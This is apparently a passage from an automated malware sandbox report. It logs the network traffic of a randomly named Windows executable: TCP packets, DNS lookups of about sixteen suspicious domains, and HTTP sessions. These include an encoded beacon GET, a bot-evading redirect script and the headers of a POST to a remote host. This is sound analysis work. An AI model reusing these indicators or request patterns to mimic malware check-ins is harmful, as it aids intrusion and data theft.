                                                                Sep 22, 2024 17:43:51.297305107 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.317950010 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.322904110 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:52.323036909 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.333945036 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:52.339867115 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212805986 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212888002 CEST8049771154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:53.212949991 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:53.844330072 CEST4977180192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.863344908 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.868274927 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:54.868607044 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.886008024 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:54.890872002 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:54.890959024 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.768338919 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.768579960 CEST8049772154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:55.769330025 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:56.391190052 CEST4977280192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.410026073 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.416735888 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:57.416810989 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.424365997 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:57.432363987 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.384762049 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.385137081 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:58.386122942 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:58.387404919 CEST4977380192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:58.392590046 CEST8049773154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:44:03.434727907 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.439666033 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:03.439754963 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.450546026 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:03.455440998 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:04.958074093 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:04.963375092 CEST8049774188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:04.963443995 CEST4977480192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.972317934 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.979597092 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:05.979686022 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.990099907 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:05.995264053 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:07.500480890 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:07.505948067 CEST8049775188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:07.506102085 CEST4977580192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.519618034 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.524751902 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:08.524840117 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.535540104 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:08.540472984 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:08.541311979 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.519821882 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.519943953 CEST8049776188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:09.520003080 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:10.047506094 CEST4977680192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.075625896 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.081465006 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:11.081573009 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.090127945 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:11.097242117 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085714102 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085736990 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085755110 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085773945 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.085810900 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.085905075 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.086250067 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:13.086294889 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.088741064 CEST4977780192.168.2.6188.114.97.3
                                                                Sep 22, 2024 17:44:13.093483925 CEST8049777188.114.97.3192.168.2.6
                                                                Sep 22, 2024 17:44:18.153865099 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.158890009 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.160089016 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.172374964 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:18.177556992 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834770918 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834799051 CEST804977881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:18.834877968 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:19.672491074 CEST4977880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.700335026 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.705210924 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:20.705280066 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.717183113 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:20.722038984 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376269102 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376296997 CEST804977981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:21.376333952 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:22.219228983 CEST4977980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.238415956 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.243473053 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.243546009 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.255611897 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:23.260659933 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.260826111 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911545038 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911577940 CEST804978081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:23.911658049 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:24.766150951 CEST4978080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.784738064 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.789872885 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:25.790373087 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.798013926 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:25.802907944 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464677095 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464704990 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:26.464878082 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:26.467561960 CEST4978180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:26.472379923 CEST804978181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:31.525639057 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.530577898 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:31.530654907 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.541647911 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:31.558275938 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248075962 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248112917 CEST8049782142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:32.248199940 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:33.047420025 CEST4978280192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.066942930 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.071996927 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.074121952 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.086030006 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:34.090938091 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898056984 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898492098 CEST8049783142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:34.898544073 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:35.598023891 CEST4978380192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.613369942 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.618269920 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:36.618356943 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.628519058 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:36.633454084 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:36.633488894 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.366883039 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.367026091 CEST8049784142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:37.367099047 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:38.141123056 CEST4978480192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.160784960 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.166006088 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.166177988 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.174176931 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.179544926 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.890641928 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.890675068 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:39.893410921 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.904529095 CEST4978680192.168.2.6142.250.185.115
                                                                Sep 22, 2024 17:44:39.909415007 CEST8049786142.250.185.115192.168.2.6
                                                                Sep 22, 2024 17:44:49.589764118 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.597887039 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:49.598031998 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.605087042 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:49.612334013 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:50.204298019 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:50.204591990 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:50.204670906 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:50.207087994 CEST4978780192.168.2.6172.81.61.224
                                                                Sep 22, 2024 17:44:50.211934090 CEST8049787172.81.61.224192.168.2.6
                                                                Sep 22, 2024 17:44:55.223121881 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.227982044 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.228075981 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.243880033 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:55.249598980 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.907061100 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.909316063 CEST804978881.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:55.909400940 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:56.750550032 CEST4978880192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.769175053 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.779541016 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:57.779702902 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.789427042 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:57.799787998 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.484381914 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.486882925 CEST804978981.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:44:58.489909887 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:44:59.297373056 CEST4978980192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.318085909 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.323455095 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:00.326219082 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.338097095 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:00.343343973 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:00.343404055 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.051942110 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.094305038 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:01.155039072 CEST804979081.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:01.155167103 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:01.845096111 CEST4979080192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.862884045 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.868096113 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:02.868213892 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.875157118 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:02.880039930 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595550060 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595602989 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:03.595757961 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:03.598330021 CEST4979180192.168.2.681.2.196.19
                                                                Sep 22, 2024 17:45:03.605232954 CEST804979181.2.196.19192.168.2.6
                                                                Sep 22, 2024 17:45:08.612783909 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:08.618849039 CEST804979285.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:45:08.618952036 CEST4979280192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:45:08.628439903 CEST4979280192.168.2.685.159.66.93
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 22, 2024 17:41:04.046338081 CEST | 192.168.2.6 | 1.1.1.1 | 0x465 | Standard query (0) | www.moritynomxd.xyz | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:19.770874977 CEST | 192.168.2.6 | 1.1.1.1 | 0xee04 | Standard query (0) | www.kovallo.cloud | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:33.300765038 CEST | 192.168.2.6 | 1.1.1.1 | 0xdaec | Standard query (0) | www.sppsuperplast.online | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:46.866096020 CEST | 192.168.2.6 | 1.1.1.1 | 0x9917 | Standard query (0) | www.tracy.club | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:00.535254002 CEST | 192.168.2.6 | 1.1.1.1 | 0xd5a7 | Standard query (0) | www.sterkus.xyz | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:13.850367069 CEST | 192.168.2.6 | 1.1.1.1 | 0x34e1 | Standard query (0) | www.syncnodex.net | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:27.473901987 CEST | 192.168.2.6 | 1.1.1.1 | 0xc127 | Standard query (0) | www.galaxyslot88rtp.lat | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:42.144592047 CEST | 192.168.2.6 | 1.1.1.1 | 0xcfa8 | Standard query (0) | www.warriorsyndrome.net | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:55.677086115 CEST | 192.168.2.6 | 1.1.1.1 | 0xf586 | Standard query (0) | www.ks1x7i.vip | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:08.832360983 CEST | 192.168.2.6 | 1.1.1.1 | 0x8702 | Standard query (0) | www.pakmartcentral.shop | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:22.144737959 CEST | 192.168.2.6 | 1.1.1.1 | 0x1bca | Standard query (0) | www.les-massage.online | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:35.973227024 CEST | 192.168.2.6 | 1.1.1.1 | 0x1aaa | Standard query (0) | www.rtpngk.xyz | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:49.539314032 CEST | 192.168.2.6 | 1.1.1.1 | 0xe978 | Standard query (0) | www.wcq24.top | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:03.394731998 CEST | 192.168.2.6 | 1.1.1.1 | 0xd358 | Standard query (0) | www.cc101.pro | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:18.097624063 CEST | 192.168.2.6 | 1.1.1.1 | 0xc9fb | Standard query (0) | www.asociacia.online | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:31.473134995 CEST | 192.168.2.6 | 1.1.1.1 | 0xcedd | Standard query (0) | www.deefbank.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 22, 2024 17:41:04.080699921 CEST | 1.1.1.1 | 192.168.2.6 | 0x465 | No error (0) | www.moritynomxd.xyz | | 172.81.61.224 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:19.907835007 CEST | 1.1.1.1 | 192.168.2.6 | 0xee04 | No error (0) | www.kovallo.cloud | kovallo.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:19.907835007 CEST | 1.1.1.1 | 192.168.2.6 | 0xee04 | No error (0) | kovallo.cloud | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:33.415821075 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaec | No error (0) | www.sppsuperplast.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:33.415821075 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaec | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:33.415821075 CEST | 1.1.1.1 | 192.168.2.6 | 0xdaec | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:46.880342960 CEST | 1.1.1.1 | 192.168.2.6 | 0x9917 | No error (0) | www.tracy.club | tracy.club | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:41:46.880342960 CEST | 1.1.1.1 | 192.168.2.6 | 0x9917 | No error (0) | tracy.club | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:41:46.880342960 CEST | 1.1.1.1 | 192.168.2.6 | 0x9917 | No error (0) | tracy.club | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:00.550533056 CEST | 1.1.1.1 | 192.168.2.6 | 0xd5a7 | No error (0) | www.sterkus.xyz | | 209.74.95.29 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:14.208965063 CEST | 1.1.1.1 | 192.168.2.6 | 0x34e1 | No error (0) | www.syncnodex.net | | 15.197.172.60 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:27.997874975 CEST | 1.1.1.1 | 192.168.2.6 | 0xc127 | No error (0) | www.galaxyslot88rtp.lat | galaxyslot88rtp.lat | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:42:27.997874975 CEST | 1.1.1.1 | 192.168.2.6 | 0xc127 | No error (0) | galaxyslot88rtp.lat | | 46.17.172.49 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:42.168911934 CEST | 1.1.1.1 | 192.168.2.6 | 0xcfa8 | No error (0) | www.warriorsyndrome.net | warriorsyndrome.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:42:42.168911934 CEST | 1.1.1.1 | 192.168.2.6 | 0xcfa8 | No error (0) | warriorsyndrome.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:42.168911934 CEST | 1.1.1.1 | 192.168.2.6 | 0xcfa8 | No error (0) | warriorsyndrome.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:55.695858955 CEST | 1.1.1.1 | 192.168.2.6 | 0xf586 | No error (0) | www.ks1x7i.vip | ks1x7i.vip | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:42:55.695858955 CEST | 1.1.1.1 | 192.168.2.6 | 0xf586 | No error (0) | ks1x7i.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:42:55.695858955 CEST | 1.1.1.1 | 192.168.2.6 | 0xf586 | No error (0) | ks1x7i.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:08.892488003 CEST | 1.1.1.1 | 192.168.2.6 | 0x8702 | No error (0) | www.pakmartcentral.shop | pakmartcentral.shop | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:43:08.892488003 CEST | 1.1.1.1 | 192.168.2.6 | 0x8702 | No error (0) | pakmartcentral.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:22.598562002 CEST | 1.1.1.1 | 192.168.2.6 | 0x1bca | No error (0) | www.les-massage.online | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:35.989449024 CEST | 1.1.1.1 | 192.168.2.6 | 0x1aaa | No error (0) | www.rtpngk.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:35.989449024 CEST | 1.1.1.1 | 192.168.2.6 | 0x1aaa | No error (0) | www.rtpngk.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:43:49.715936899 CEST | 1.1.1.1 | 192.168.2.6 | 0xe978 | No error (0) | www.wcq24.top | wcq24.top | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:43:49.715936899 CEST | 1.1.1.1 | 192.168.2.6 | 0xe978 | No error (0) | wcq24.top | | 154.23.184.240 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:03.432013988 CEST | 1.1.1.1 | 192.168.2.6 | 0xd358 | No error (0) | www.cc101.pro | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:03.432013988 CEST | 1.1.1.1 | 192.168.2.6 | 0xd358 | No error (0) | www.cc101.pro | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:18.151195049 CEST | 1.1.1.1 | 192.168.2.6 | 0xc9fb | No error (0) | www.asociacia.online | asociacia.online | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:44:18.151195049 CEST | 1.1.1.1 | 192.168.2.6 | 0xc9fb | No error (0) | asociacia.online | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Sep 22, 2024 17:44:31.523127079 CEST | 1.1.1.1 | 192.168.2.6 | 0xcedd | No error (0) | www.deefbank.net | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 22, 2024 17:44:31.523127079 CEST | 1.1.1.1 | 192.168.2.6 | 0xcedd | No error (0) | ghs.googlehosted.com | | 142.250.185.115 | A (IP address) | IN (0x0001) | false
Session ID: 0 | Source IP: 192.168.2.6 | Source Port: 49718 | Destination IP: 172.81.61.224 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:41:04.101147890 CEST | 423 | OUT | GET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.moritynomxd.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Sep 22, 2024 17:41:04.719127893 CEST | 728 | IN | HTTP/1.1 200 OK
                                                                Content-Type: text/html; charset=utf-8
                                                                X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                                X-Ratelimit-Limit: 500
                                                                X-Ratelimit-Remaining: 499
                                                                X-Ratelimit-Reset: 1727023264
                                                                Date: Sun, 22 Sep 2024 15:41:04 GMT
                                                                Content-Length: 458
                                                                Connection: close
                                                                Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49720 | Destination IP: 81.2.196.19 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:41:19.964936018 CEST | 686 | OUT | POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
